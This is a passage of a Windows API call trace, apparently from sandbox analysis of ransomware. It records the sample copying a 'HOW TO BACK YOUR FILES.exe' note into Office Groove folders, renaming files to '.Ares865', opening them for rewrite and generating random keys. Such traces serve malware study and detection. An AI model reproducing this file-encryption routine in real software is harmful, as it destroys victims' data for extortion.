hHeap=0x2b0000) returned 1 [0071.170] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d2640 | out: hHeap=0x2b0000) returned 1 [0071.170] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\XML Files") returned 59 [0071.170] lstrcatW (in: lpString1="", lpString2="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\XML Files" | out: lpString1="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\XML Files") returned="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\XML Files" [0071.170] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0071.170] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\XML Files\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\xml files\\how to back your files.exe"), bFailIfExists=1) returned 1 [0071.180] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0071.180] FindFirstFileW (in: lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\XML Files\\*", lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x50e7acd0, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x5becf400, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x5becf400, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2cd0e8 [0071.180] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0071.180] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0071.180] wsprintfW (in: param_1=0x2e2d5f8, param_2="%s.%s" | out: param_1="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\XML Files\\Messenger.xml.Ares865") returned 81 [0071.180] MoveFileExW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\XML Files\\Messenger.xml" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\xml files\\messenger.xml"), lpNewFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\XML Files\\Messenger.xml.Ares865" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\xml files\\messenger.xml.ares865"), dwFlags=0x1) returned 1 [0071.182] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\XML Files\\Messenger.xml.Ares865" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\xml files\\messenger.xml.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0071.183] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2e2e4f0 | out: lpFileSize=0x2e2e4f0*=330) returned 1 [0071.183] CryptAcquireContextW (in: phProv=0x2e2d2b4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2e2d2b4*=0x2f0380) returned 1 [0071.183] CryptGenRandom (in: hProv=0x2f0380, dwLen=0x80, pbBuffer=0x2e2d2c8 | out: pbBuffer=0x2e2d2c8) returned 1 [0071.183] CryptReleaseContext (hProv=0x2f0380, dwFlags=0x0) returned 1 [0071.187] CryptAcquireContextW (in: phProv=0x2e2d264, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2e2d264*=0x2f0380) returned 1 [0071.188] CryptGenRandom (in: hProv=0x2f0380, dwLen=0x80, pbBuffer=0x2e2d278 | out: pbBuffer=0x2e2d278) returned 1 [0071.188] CryptReleaseContext (hProv=0x2f0380, dwFlags=0x0) returned 1 [0071.188] wsprintfW (in: param_1=0x2e2d5f8, param_2="%s.%s" | out: param_1="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\XML Files\\StarterApplicationDescriptors.xml.Ares865") returned 101 [0071.188] MoveFileExW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\XML Files\\StarterApplicationDescriptors.xml" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\xml files\\starterapplicationdescriptors.xml"), lpNewFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\XML Files\\StarterApplicationDescriptors.xml.Ares865" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\xml files\\starterapplicationdescriptors.xml.ares865"), dwFlags=0x1) returned 1 [0071.191] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\XML Files\\StarterApplicationDescriptors.xml.Ares865" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\xml files\\starterapplicationdescriptors.xml.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0071.191] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2e2e4f0 | out: lpFileSize=0x2e2e4f0*=97837) returned 1 [0071.191] CryptAcquireContextW (in: phProv=0x2e2d2b4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2e2d2b4*=0x2f0380) returned 1 [0071.192] CryptGenRandom (in: hProv=0x2f0380, dwLen=0x80, pbBuffer=0x2e2d2c8 | out: pbBuffer=0x2e2d2c8) returned 1 [0071.192] CryptReleaseContext (hProv=0x2f0380, dwFlags=0x0) returned 1 [0071.209] CryptAcquireContextW (in: phProv=0x2e2d264, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2e2d264*=0x2f0380) returned 1 [0071.211] CryptGenRandom (in: hProv=0x2f0380, dwLen=0x80, pbBuffer=0x2e2d278 | out: pbBuffer=0x2e2d278) returned 1 [0071.211] CryptReleaseContext (hProv=0x2f0380, dwFlags=0x0) returned 1 [0071.213] wsprintfW (in: param_1=0x2e2d5f8, param_2="%s.%s" | out: param_1="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\XML Files\\StarterNotificationDescriptors.xml.Ares865") returned 102 [0071.213] MoveFileExW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\XML Files\\StarterNotificationDescriptors.xml" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\xml files\\starternotificationdescriptors.xml"), lpNewFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\XML Files\\StarterNotificationDescriptors.xml.Ares865" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\xml files\\starternotificationdescriptors.xml.ares865"), dwFlags=0x1) returned 1 [0071.214] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\XML Files\\StarterNotificationDescriptors.xml.Ares865" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\xml files\\starternotificationdescriptors.xml.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0071.214] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2e2e4f0 | out: lpFileSize=0x2e2e4f0*=112757) returned 1 [0071.214] CryptAcquireContextW (in: phProv=0x2e2d2b4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2e2d2b4*=0x2f0380) returned 1 [0071.215] CryptGenRandom (in: hProv=0x2f0380, dwLen=0x80, pbBuffer=0x2e2d2c8 | out: pbBuffer=0x2e2d2c8) returned 1 [0071.215] CryptReleaseContext (hProv=0x2f0380, dwFlags=0x0) returned 1 [0071.225] CryptAcquireContextW (in: phProv=0x2e2d264, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2e2d264*=0x2f0380) returned 1 [0071.226] CryptGenRandom (in: hProv=0x2f0380, dwLen=0x80, pbBuffer=0x2e2d278 | out: pbBuffer=0x2e2d278) returned 1 [0071.226] CryptReleaseContext (hProv=0x2f0380, dwFlags=0x0) returned 1 [0071.228] wsprintfW (in: param_1=0x2e2d5f8, param_2="%s.%s" | out: param_1="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\XML Files\\StarterToolTemplates.xml.Ares865") returned 92 [0071.228] MoveFileExW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\XML Files\\StarterToolTemplates.xml" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\xml files\\startertooltemplates.xml"), lpNewFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\XML Files\\StarterToolTemplates.xml.Ares865" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\xml files\\startertooltemplates.xml.ares865"), dwFlags=0x1) returned 1 [0071.233] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\XML Files\\StarterToolTemplates.xml.Ares865" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\xml files\\startertooltemplates.xml.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0071.233] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2e2e4f0 | out: lpFileSize=0x2e2e4f0*=107859) returned 1 [0071.234] CryptAcquireContextW (in: phProv=0x2e2d2b4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2e2d2b4*=0x2f0380) returned 1 [0071.234] CryptGenRandom (in: hProv=0x2f0380, dwLen=0x80, pbBuffer=0x2e2d2c8 | out: pbBuffer=0x2e2d2c8) returned 1 [0071.234] CryptReleaseContext (hProv=0x2f0380, dwFlags=0x0) returned 1 [0071.249] CryptAcquireContextW (in: phProv=0x2e2d264, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2e2d264*=0x2f0380) returned 1 [0071.250] CryptGenRandom (in: hProv=0x2f0380, dwLen=0x80, pbBuffer=0x2e2d278 | out: pbBuffer=0x2e2d278) returned 1 [0071.250] CryptReleaseContext (hProv=0x2f0380, dwFlags=0x0) returned 1 [0071.252] lstrcpynW (in: lpString1=0x2e2e860, lpString2="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\XML Files\\Space Templates", iMaxLength=260 | out: lpString1="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\XML Files\\Space Templates") returned="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\XML Files\\Space Templates" [0071.252] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x335108 | out: hHeap=0x2b0000) returned 1 [0071.252] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d2640 | out: hHeap=0x2b0000) returned 1 [0071.252] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\XML Files\\Space Templates") returned 75 [0071.252] lstrcatW (in: lpString1="", lpString2="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\XML Files\\Space Templates" | out: lpString1="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\XML Files\\Space Templates") returned="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\XML Files\\Space Templates" [0071.252] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0071.252] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\XML Files\\Space Templates\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\xml files\\space templates\\how to back your files.exe"), bFailIfExists=1) returned 1 [0071.256] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0071.256] FindFirstFileW (in: lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\XML Files\\Space Templates\\*", lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x50e7acd0, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x5bf8dae0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x5bf8dae0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2cd0e8 [0071.256] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0071.257] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0071.257] lstrcpynW (in: lpString1=0x2e2e860, lpString2="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolIcons", iMaxLength=260 | out: lpString1="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolIcons") returned="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolIcons" [0071.257] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2c1808 | out: hHeap=0x2b0000) returned 1 [0071.257] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d2500 | out: hHeap=0x2b0000) returned 1 [0071.257] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolIcons") returned 59 [0071.257] lstrcatW (in: lpString1="", lpString2="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolIcons" | out: lpString1="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolIcons") returned="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolIcons" [0071.257] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0071.257] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolIcons\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\toolicons\\how to back your files.exe"), bFailIfExists=1) returned 1 [0071.264] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0071.264] FindFirstFileW (in: lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolIcons\\*", lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x52a4cdf0, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x5bfb3c40, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x5bfb3c40, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2cd0e8 [0071.264] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0071.264] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0071.266] lstrcpynW (in: lpString1=0x2e2e860, lpString2="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData", iMaxLength=260 | out: lpString1="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData") returned="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData" [0071.266] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2c1788 | out: hHeap=0x2b0000) returned 1 [0071.266] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d24e0 | out: hHeap=0x2b0000) returned 1 [0071.266] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData") returned 58 [0071.266] lstrcatW (in: lpString1="", lpString2="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData" | out: lpString1="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData") returned="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData" [0071.266] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0071.266] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\tooldata\\how to back your files.exe"), bFailIfExists=1) returned 1 [0071.276] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0071.276] FindFirstFileW (in: lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\*", lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x51174850, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x5bfb3c40, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x5bfb3c40, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2cd0e8 [0071.276] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0071.276] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0071.276] lstrcpynW (in: lpString1=0x2e2e860, lpString2="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net", iMaxLength=260 | out: lpString1="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net") returned="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net" [0071.276] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2cff70 | out: hHeap=0x2b0000) returned 1 [0071.277] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d24e0 | out: hHeap=0x2b0000) returned 1 [0071.277] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net") returned 69 [0071.277] lstrcatW (in: lpString1="", lpString2="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net" | out: lpString1="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net") returned="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net" [0071.277] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0071.277] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\tooldata\\groove.net\\how to back your files.exe"), bFailIfExists=1) returned 1 [0071.282] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0071.282] FindFirstFileW (in: lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\*", lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x51174850, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x5bfd9da0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x5bfd9da0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2cd0e8 [0071.282] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0071.282] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0071.282] lstrcpynW (in: lpString1=0x2e2e860, lpString2="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\Welcome Tool", iMaxLength=260 | out: lpString1="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\Welcome Tool") returned="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\Welcome Tool" [0071.282] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e3370 | out: hHeap=0x2b0000) returned 1 [0071.282] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d2760 | out: hHeap=0x2b0000) returned 1 [0071.282] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\Welcome Tool") returned 82 [0071.282] lstrcatW (in: lpString1="", lpString2="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\Welcome Tool" | out: lpString1="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\Welcome Tool") returned="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\Welcome Tool" [0071.282] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0071.282] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\Welcome Tool\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\tooldata\\groove.net\\welcome tool\\how to back your files.exe"), bFailIfExists=1) returned 1 [0071.289] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0071.289] FindFirstFileW (in: lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\Welcome Tool\\*", lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x53907610, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x5bfd9da0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x5bfd9da0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2cd0e8 [0071.289] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0071.289] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0071.289] lstrcpynW (in: lpString1=0x2e2e860, lpString2="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveProjectToolset", iMaxLength=260 | out: lpString1="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveProjectToolset") returned="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveProjectToolset" [0071.289] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x31f088 | out: hHeap=0x2b0000) returned 1 [0071.289] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d2740 | out: hHeap=0x2b0000) returned 1 [0071.289] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveProjectToolset") returned 90 [0071.289] lstrcatW (in: lpString1="", lpString2="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveProjectToolset" | out: lpString1="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveProjectToolset") returned="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveProjectToolset" [0071.289] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0071.289] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveProjectToolset\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\tooldata\\groove.net\\grooveprojecttoolset\\how to back your files.exe"), bFailIfExists=1) returned 1 [0071.299] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0071.299] FindFirstFileW (in: lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveProjectToolset\\*", lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x51a61ad0, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x5bffff00, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x5bffff00, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2cd0e8 [0071.299] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0071.299] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0071.301] lstrcpynW (in: lpString1=0x2e2e860, lpString2="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveProjectToolset\\ProjectTool", iMaxLength=260 | out: lpString1="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveProjectToolset\\ProjectTool") returned="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveProjectToolset\\ProjectTool" [0071.301] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d40a8 | out: hHeap=0x2b0000) returned 1 [0071.301] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d2740 | out: hHeap=0x2b0000) returned 1 [0071.301] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveProjectToolset\\ProjectTool") returned 102 [0071.301] lstrcatW (in: lpString1="", lpString2="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveProjectToolset\\ProjectTool" | out: lpString1="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveProjectToolset\\ProjectTool") returned="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveProjectToolset\\ProjectTool" [0071.301] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0071.301] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveProjectToolset\\ProjectTool\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\tooldata\\groove.net\\grooveprojecttoolset\\projecttool\\how to back your files.exe"), bFailIfExists=1) returned 1 [0071.320] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0071.320] FindFirstFileW (in: lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveProjectToolset\\ProjectTool\\*", lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x538bb350, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x5c026060, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x5c026060, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2cd0e8 [0071.321] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") 